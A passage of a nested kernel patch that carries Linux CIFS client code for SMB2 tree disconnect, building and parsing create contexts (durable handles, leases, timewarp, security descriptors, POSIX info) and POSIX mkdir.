+-	    !(server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		cifs_tcon_dbg(VFS, "Encryption is requested but not supported\n");
+-
+-	init_copy_chunk_defaults(tcon);
+-	if (server->ops->validate_negotiate)
+-		rc = server->ops->validate_negotiate(xid, tcon);
+-tcon_exit:
+-
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(unc_path);
+-	return rc;
+-
+-tcon_error_exit:
+-	if (rsp && rsp->hdr.Status == STATUS_BAD_NETWORK_NAME)
+-		cifs_tcon_dbg(VFS, "BAD_NETWORK_NAME: %s\n", tree);
+-	goto tcon_exit;
+-}
+-
+-int
+-SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_tree_disconnect_req *req; /* response is trivial */
+-	int rc = 0;
+-	struct cifs_ses *ses = tcon->ses;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "Tree Disconnect\n");
+-
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	trace_smb3_tdis_enter(xid, tcon->tid, ses->Suid, tcon->tree_name);
+-	spin_lock(&ses->chan_lock);
+-	if ((tcon->need_reconnect) ||
+-	    (CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses))) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	invalidate_all_cached_dirs(tcon);
+-
+-	rc = smb2_plain_req_init(SMB2_TREE_DISCONNECT, tcon, ses->server,
+-				 (void **) &req,
+-				 &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_TREE_DISCONNECT_HE);
+-		trace_smb3_tdis_err(xid, tcon->tid, ses->Suid, rc);
+-	}
+-	trace_smb3_tdis_done(xid, tcon->tid, ses->Suid);
+-
+-	return rc;
+-}
+-
+-
+-static struct create_durable *
+-create_durable_buf(void)
+-{
+-	struct create_durable *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(16);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DHnQ" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'Q';
+-	return buf;
+-}
+-
+-static struct create_durable *
+-create_reconnect_durable_buf(struct cifs_fid *fid)
+-{
+-	struct create_durable *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(16);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	buf->Data.Fid.PersistentFileId = fid->persistent_fid;
+-	buf->Data.Fid.VolatileFileId = fid->volatile_fid;
+-	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT is "DHnC" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'C';
+-	return buf;
+-}
+-
+-static void
+-parse_query_id_ctxt(struct create_context *cc, struct smb2_file_all_info *buf)
+-{
+-	struct create_on_disk_id *pdisk_id = (struct create_on_disk_id *)cc;
+-
+-	cifs_dbg(FYI, "parse query id context 0x%llx 0x%llx\n",
+-		pdisk_id->DiskFileId, pdisk_id->VolumeId);
+-	buf->IndexNumber = pdisk_id->DiskFileId;
+-}
+-
+-static void
+-parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
+-		 struct create_posix_rsp *posix)
+-{
+-	int sid_len;
+-	u8 *beg = (u8 *)cc + le16_to_cpu(cc->DataOffset);
+-	u8 *end = beg + le32_to_cpu(cc->DataLength);
+-	u8 *sid;
+-
+-	memset(posix, 0, sizeof(*posix));
+-
+-	posix->nlink = le32_to_cpu(*(__le32 *)(beg + 0));
+-	posix->reparse_tag = le32_to_cpu(*(__le32 *)(beg + 4));
+-	posix->mode = le32_to_cpu(*(__le32 *)(beg + 8));
+-
+-	sid = beg + 12;
+-	sid_len = posix_info_sid_size(sid, end);
+-	if (sid_len < 0) {
+-		cifs_dbg(VFS, "bad owner sid in posix create response\n");
+-		return;
+-	}
+-	memcpy(&posix->owner, sid, sid_len);
+-
+-	sid = sid + sid_len;
+-	sid_len = posix_info_sid_size(sid, end);
+-	if (sid_len < 0) {
+-		cifs_dbg(VFS, "bad group sid in posix create response\n");
+-		return;
+-	}
+-	memcpy(&posix->group, sid, sid_len);
+-
+-	cifs_dbg(FYI, "nlink=%d mode=%o reparse_tag=%x\n",
+-		 posix->nlink, posix->mode, posix->reparse_tag);
+-}
+-
+-void
+-smb2_parse_contexts(struct TCP_Server_Info *server,
+-		    struct smb2_create_rsp *rsp,
+-		    unsigned int *epoch, char *lease_key, __u8 *oplock,
+-		    struct smb2_file_all_info *buf,
+-		    struct create_posix_rsp *posix)
+-{
+-	char *data_offset;
+-	struct create_context *cc;
+-	unsigned int next;
+-	unsigned int remaining;
+-	char *name;
+-	static const char smb3_create_tag_posix[] = {
+-		0x93, 0xAD, 0x25, 0x50, 0x9C,
+-		0xB4, 0x11, 0xE7, 0xB4, 0x23, 0x83,
+-		0xDE, 0x96, 0x8B, 0xCD, 0x7C
+-	};
+-
+-	*oplock = 0;
+-	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
+-	remaining = le32_to_cpu(rsp->CreateContextsLength);
+-	cc = (struct create_context *)data_offset;
+-
+-	/* Initialize inode number to 0 in case no valid data in qfid context */
+-	if (buf)
+-		buf->IndexNumber = 0;
+-
+-	while (remaining >= sizeof(struct create_context)) {
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) == 4 &&
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
+-			*oplock = server->ops->parse_lease_buf(cc, epoch,
+-							   lease_key);
+-		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
+-		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
+-			parse_query_id_ctxt(cc, buf);
+-		else if ((le16_to_cpu(cc->NameLength) == 16)) {
+-			if (posix &&
+-			    memcmp(name, smb3_create_tag_posix, 16) == 0)
+-				parse_posix_ctxt(cc, buf, posix);
+-		}
+-		/* else {
+-			cifs_dbg(FYI, "Context not matched with len %d\n",
+-				le16_to_cpu(cc->NameLength));
+-			cifs_dump_mem("Cctxt name: ", name, 4);
+-		} */
+-
+-		next = le32_to_cpu(cc->Next);
+-		if (!next)
+-			break;
+-		remaining -= next;
+-		cc = (struct create_context *)((char *)cc + next);
+-	}
+-
+-	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+-		*oplock = rsp->OplockLevel;
+-
+-	return;
+-}
+-
+-static int
+-add_lease_context(struct TCP_Server_Info *server, struct kvec *iov,
+-		  unsigned int *num_iovec, u8 *lease_key, __u8 *oplock)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = server->ops->create_lease_buf(lease_key, *oplock);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = server->vals->create_lease_size;
+-	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength,
+-		     server->vals->create_lease_size);
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static struct create_durable_v2 *
+-create_durable_v2_buf(struct cifs_open_parms *oparms)
+-{
+-	struct cifs_fid *pfid = oparms->fid;
+-	struct create_durable_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable_v2), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable_v2, dcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct durable_context_v2));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable_v2, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-
+-	/*
+-	 * NB: Handle timeout defaults to 0, which allows server to choose
+-	 * (most servers default to 120 seconds) and most clients default to 0.
+-	 * This can be overridden at mount ("handletimeout=") if the user wants
+-	 * a different persistent (or resilient) handle timeout for all
+-	 * opens on a particular SMB3 mount.
+-	 */
+-	buf->dcontext.Timeout = cpu_to_le32(oparms->tcon->handle_timeout);
+-	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
+-	generate_random_uuid(buf->dcontext.CreateGuid);
+-	memcpy(pfid->create_guid, buf->dcontext.CreateGuid, 16);
+-
+-	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2 is "DH2Q" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'Q';
+-	return buf;
+-}
+-
+-static struct create_durable_handle_reconnect_v2 *
+-create_reconnect_durable_v2_buf(struct cifs_fid *fid)
+-{
+-	struct create_durable_handle_reconnect_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable_handle_reconnect_v2),
+-			GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset =
+-		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
+-				     dcontext));
+-	buf->ccontext.DataLength =
+-		cpu_to_le32(sizeof(struct durable_reconnect_context_v2));
+-	buf->ccontext.NameOffset =
+-		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
+-			    Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-
+-	buf->dcontext.Fid.PersistentFileId = fid->persistent_fid;
+-	buf->dcontext.Fid.VolatileFileId = fid->volatile_fid;
+-	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
+-	memcpy(buf->dcontext.CreateGuid, fid->create_guid, 16);
+-
+-	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2 is "DH2C" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'C';
+-	return buf;
+-}
+-
+-static int
+-add_durable_v2_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_durable_v2_buf(oparms);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable_v2);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable_v2));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-add_durable_reconnect_v2_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	/* indicate that we don't need to relock the file */
+-	oparms->reconnect = false;
+-
+-	iov[num].iov_base = create_reconnect_durable_v2_buf(oparms->fid);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable_handle_reconnect_v2);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength,
+-			sizeof(struct create_durable_handle_reconnect_v2));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-add_durable_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms, bool use_persistent)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	if (use_persistent) {
+-		if (oparms->reconnect)
+-			return add_durable_reconnect_v2_context(iov, num_iovec,
+-								oparms);
+-		else
+-			return add_durable_v2_context(iov, num_iovec, oparms);
+-	}
+-
+-	if (oparms->reconnect) {
+-		iov[num].iov_base = create_reconnect_durable_buf(oparms->fid);
+-		/* indicate that we don't need to relock the file */
+-		oparms->reconnect = false;
+-	} else
+-		iov[num].iov_base = create_durable_buf();
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.7 */
+-static struct crt_twarp_ctxt *
+-create_twarp_buf(__u64 timewarp)
+-{
+-	struct crt_twarp_ctxt *buf;
+-
+-	buf = kzalloc(sizeof(struct crt_twarp_ctxt), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct crt_twarp_ctxt, Timestamp));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct crt_twarp_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_TIMEWARP_TOKEN is "TWrp" */
+-	buf->Name[0] = 'T';
+-	buf->Name[1] = 'W';
+-	buf->Name[2] = 'r';
+-	buf->Name[3] = 'p';
+-	buf->Timestamp = cpu_to_le64(timewarp);
+-	return buf;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.7 */
+-static int
+-add_twarp_context(struct kvec *iov, unsigned int *num_iovec, __u64 timewarp)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_twarp_buf(timewarp);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct crt_twarp_ctxt);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_twarp_ctxt));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-/* See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx */
+-static void setup_owner_group_sids(char *buf)
+-{
+-	struct owner_group_sids *sids = (struct owner_group_sids *)buf;
+-
+-	/* Populate the user ownership fields S-1-5-88-1 */
+-	sids->owner.Revision = 1;
+-	sids->owner.NumAuth = 3;
+-	sids->owner.Authority[5] = 5;
+-	sids->owner.SubAuthorities[0] = cpu_to_le32(88);
+-	sids->owner.SubAuthorities[1] = cpu_to_le32(1);
+-	sids->owner.SubAuthorities[2] = cpu_to_le32(current_fsuid().val);
+-
+-	/* Populate the group ownership fields S-1-5-88-2 */
+-	sids->group.Revision = 1;
+-	sids->group.NumAuth = 3;
+-	sids->group.Authority[5] = 5;
+-	sids->group.SubAuthorities[0] = cpu_to_le32(88);
+-	sids->group.SubAuthorities[1] = cpu_to_le32(2);
+-	sids->group.SubAuthorities[2] = cpu_to_le32(current_fsgid().val);
+-
+-	cifs_dbg(FYI, "owner S-1-5-88-1-%d, group S-1-5-88-2-%d\n", current_fsuid().val, current_fsgid().val);
+-}
+-
+-/* See MS-SMB2 2.2.13.2.2 and MS-DTYP 2.4.6 */
+-static struct crt_sd_ctxt *
+-create_sd_buf(umode_t mode, bool set_owner, unsigned int *len)
+-{
+-	struct crt_sd_ctxt *buf;
+-	__u8 *ptr, *aclptr;
+-	unsigned int acelen, acl_size, ace_count;
+-	unsigned int owner_offset = 0;
+-	unsigned int group_offset = 0;
+-	struct smb3_acl acl = {};
+-
+-	*len = round_up(sizeof(struct crt_sd_ctxt) + (sizeof(struct cifs_ace) * 4), 8);
+-
+-	if (set_owner) {
+-		/* sizeof(struct owner_group_sids) is already a multiple of 8, so no need to round */
+-		*len += sizeof(struct owner_group_sids);
+-	}
+-
+-	buf = kzalloc(*len, GFP_KERNEL);
+-	if (buf == NULL)
+-		return buf;
+-
+-	ptr = (__u8 *)&buf[1];
+-	if (set_owner) {
+-		/* offset fields are from the beginning of the security descriptor, not the create context */
+-		owner_offset = ptr - (__u8 *)&buf->sd;
+-		buf->sd.OffsetOwner = cpu_to_le32(owner_offset);
+-		group_offset = owner_offset + offsetof(struct owner_group_sids, group);
+-		buf->sd.OffsetGroup = cpu_to_le32(group_offset);
+-
+-		setup_owner_group_sids(ptr);
+-		ptr += sizeof(struct owner_group_sids);
+-	} else {
+-		buf->sd.OffsetOwner = 0;
+-		buf->sd.OffsetGroup = 0;
+-	}
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, sd));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_SD_BUFFER_TOKEN is "SecD" */
+-	buf->Name[0] = 'S';
+-	buf->Name[1] = 'e';
+-	buf->Name[2] = 'c';
+-	buf->Name[3] = 'D';
+-	buf->sd.Revision = 1;  /* Must be one see MS-DTYP 2.4.6 */
+-
+-	/*
+-	 * ACL is "self relative" ie ACL is stored in contiguous block of memory
+-	 * and "DP" ie the DACL is present
+-	 */
+-	buf->sd.Control = cpu_to_le16(ACL_CONTROL_SR | ACL_CONTROL_DP);
+-
+-	/* offset owner, group and Sbz1 and SACL are all zero */
+-	buf->sd.OffsetDacl = cpu_to_le32(ptr - (__u8 *)&buf->sd);
+-	/* Skip the ACL for now. We will copy it into buf later. */
+-	aclptr = ptr;
+-	ptr += sizeof(struct smb3_acl);
+-
+-	/* create one ACE to hold the mode embedded in reserved special SID */
+-	acelen = setup_special_mode_ACE((struct cifs_ace *)ptr, (__u64)mode);
+-	ptr += acelen;
+-	acl_size = acelen + sizeof(struct smb3_acl);
+-	ace_count = 1;
+-
+-	if (set_owner) {
+-		/* we do not need to reallocate the buffer to add two more ACEs; plenty of space */
+-		acelen = setup_special_user_owner_ACE((struct cifs_ace *)ptr);
+-		ptr += acelen;
+-		acl_size += acelen;
+-		ace_count += 1;
+-	}
+-
+-	/* and one more ACE to allow access for authenticated users */
+-	acelen = setup_authusers_ACE((struct cifs_ace *)ptr);
+-	ptr += acelen;
+-	acl_size += acelen;
+-	ace_count += 1;
+-
+-	acl.AclRevision = ACL_REVISION; /* See 2.4.4.1 of MS-DTYP */
+-	acl.AclSize = cpu_to_le16(acl_size);
+-	acl.AceCount = cpu_to_le16(ace_count);
+-	/* acl.Sbz1 and Sbz2 MBZ, so they are not set here; both were zeroed above */
+-	memcpy(aclptr, &acl, sizeof(struct smb3_acl));
+-
+-	buf->ccontext.DataLength = cpu_to_le32(ptr - (__u8 *)&buf->sd);
+-	*len = round_up((unsigned int)(ptr - (__u8 *)buf), 8);
+-
+-	return buf;
+-}
+-
+-static int
+-add_sd_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode, bool set_owner)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-	unsigned int len = 0;
+-
+-	iov[num].iov_base = create_sd_buf(mode, set_owner, &len);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = len;
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, len);
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static struct crt_query_id_ctxt *
+-create_query_id_buf(void)
+-{
+-	struct crt_query_id_ctxt *buf;
+-
+-	buf = kzalloc(sizeof(struct crt_query_id_ctxt), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(0);
+-	buf->ccontext.DataLength = cpu_to_le32(0);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct crt_query_id_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_ON_DISK_ID is "QFid" */
+-	buf->Name[0] = 'Q';
+-	buf->Name[1] = 'F';
+-	buf->Name[2] = 'i';
+-	buf->Name[3] = 'd';
+-	return buf;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.9 */
+-static int
+-add_query_id_context(struct kvec *iov, unsigned int *num_iovec)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_query_id_buf();
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct crt_query_id_ctxt);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_query_id_ctxt));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-alloc_path_with_tree_prefix(__le16 **out_path, int *out_size, int *out_len,
+-			    const char *treename, const __le16 *path)
+-{
+-	int treename_len, path_len;
+-	struct nls_table *cp;
+-	const __le16 sep[] = {cpu_to_le16('\\'), cpu_to_le16(0x0000)};
+-
+-	/*
+-	 * skip leading "\\"
+-	 */
+-	treename_len = strlen(treename);
+-	if (treename_len < 2 || !(treename[0] == '\\' && treename[1] == '\\'))
+-		return -EINVAL;
+-
+-	treename += 2;
+-	treename_len -= 2;
+-
+-	path_len = UniStrnlen((wchar_t *)path, PATH_MAX);
+-
+-	/* make room for one path separator only if @path isn't empty */
+-	*out_len = treename_len + (path[0] ? 1 : 0) + path_len;
+-
+-	/*
+-	 * final path needs to be 8-byte aligned as specified in
+-	 * MS-SMB2 2.2.13 SMB2 CREATE Request.
+-	 */
+-	*out_size = round_up(*out_len * sizeof(__le16), 8);
+-	*out_path = kzalloc(*out_size + sizeof(__le16) /* null */, GFP_KERNEL);
+-	if (!*out_path)
+-		return -ENOMEM;
+-
+-	cp = load_nls_default();
+-	cifs_strtoUTF16(*out_path, treename, treename_len, cp);
+-
+-	/* Do not append the separator if the path is empty */
+-	if (path[0] != cpu_to_le16(0x0000)) {
+-		UniStrcat(*out_path, sep);
+-		UniStrcat(*out_path, path);
+-	}
+-
+-	unload_nls(cp);
+-
+-	return 0;
+-}
+-
+-int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+-			       umode_t mode, struct cifs_tcon *tcon,
+-			       const char *full_path,
+-			       struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_create_req *req;
+-	struct smb2_create_rsp *rsp = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct kvec iov[3]; /* make sure at least one for each open context */
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype;
+-	int uni_path_len;
+-	__le16 *copy_path = NULL;
+-	int copy_size;
+-	int rc = 0;
+-	unsigned int n_iov = 2;
+-	__u32 file_attributes = 0;
+-	char *pc_buf = NULL;
+-	int flags = 0;
+-	unsigned int total_len;
+-	__le16 *utf16_path = NULL;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-
+-	cifs_dbg(FYI, "mkdir\n");
+-
+-	/* resource #1: path allocation */
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (!ses || !server) {
+-		rc = -EIO;
+-		goto err_free_path;
+-	}
+-
+-	/* resource #2: request */
+-	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		goto err_free_path;
+-
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->ImpersonationLevel = IL_IMPERSONATION;
+-	req->DesiredAccess = cpu_to_le32(FILE_WRITE_ATTRIBUTES);
+-	/* File attributes ignored on open (used in create though) */
+-	req->FileAttributes = cpu_to_le32(file_attributes);
+-	req->ShareAccess = FILE_SHARE_ALL_LE;
+-	req->CreateDisposition = cpu_to_le32(FILE_CREATE);
+-	req->CreateOptions = cpu_to_le32(CREATE_NOT_FILE);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* -1 since last byte is buf[0] which is sent below (path) */
+-	iov[0].iov_len = total_len - 1;
+-
+-	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
+-
+-	/* [MS-SMB2] 2.2.13 NameOffset:
+-	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
+-	 * the SMB2 header, the file name includes a prefix that will
+-	 * be processed during DFS name normalization as specified in
+-	 * section 3.3.5.9. Otherwise, the file name is relative to
+-	 * the share that is identified by the TreeId in the SMB2
+-	 * header.
+-	 */
+-	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
+-		int name_len;
+-
+-		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
+-		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
+-						 &name_len,
+-						 tcon->tree_name, utf16_path);
+-		if (rc)
+-			goto err_free_req;
+-
+-		req->NameLength = cpu_to_le16(name_len * 2);
+-		uni_path_len = copy_size;
+-		/* free before overwriting resource */
+-		kfree(utf16_path);
+-		utf16_path = copy_path;
+-	} else {
+-		uni_path_len = (2 * UniStrnlen((wchar_t *)utf16_path, PATH_MAX)) + 2;
+-		/* MUST set path len (NameLength) to 0 when opening the root of the share */
+-		req->NameLength = cpu_to_le16(uni_path_len - 2);
+-		if (uni_path_len % 8 != 0) {
+-			copy_size = roundup(uni_path_len, 8);
+-			copy_path = kzalloc(copy_size, GFP_KERNEL);
+-			if (!copy_path) {
+-				rc = -ENOMEM;
+-				goto err_free_req;
+-			}
+-			memcpy((char *)copy_path, (const char *)utf16_path,
+-			       uni_path_len);
+-			uni_path_len = copy_size;
+-			/* free before overwriting resource */
+-			kfree(utf16_path);
+-			utf16_path = copy_path;
+-		}
+-	}
+-
+-	iov[1].iov_len = uni_path_len;
+-	iov[1].iov_base = utf16_path;
+-	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (tcon->posix_extensions) {
+-		/* resource #3: posix buf */
+-		rc = add_posix_context(iov, &n_iov, mode);
+-		if (rc)
+-			goto err_free_req;
+-		pc_buf = iov[n_iov-1].iov_base;
+-	}
+-
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = n_iov;
+-
+-	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+-				    FILE_WRITE_ATTRIBUTES);
+-	/* resource #4: response buffer */
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
+-		trace_smb3_posix_mkdir_err(xid, tcon->tid, ses->Suid,
+-					   CREATE_NOT_FILE,
+-					   FILE_WRITE_ATTRIBUTES, rc);
+-		goto err_free_rsp_buf;
+-	}
+-
+-	/*
+-	 * Although it is unlikely for rsp to be null with rc not set,
+-	 * adding the check below is slightly safer long term (and quiets a
+-	 * Coverity warning)
+-	 */
+-	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
+-	if (rsp == NULL) {
+-		rc = -EIO;
+-		kfree(pc_buf);
+-		goto err_free_req;
+-	}
+-
+-	trace_smb3_posix_mkdir_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
+-				    CREATE_NOT_FILE, FILE_WRITE_ATTRIBUTES);
+-
+-	SMB2_close(xid, tcon, rsp->PersistentFileId, rsp->VolatileFileId);
+-
+-	/* Eventually save off posix specific response info and timestamps */
+-
+-err_free_rsp_buf:
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(pc_buf);
+-err_free_req:
+-	cifs_small_buf_release(req);
+-err_free_path:
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-int
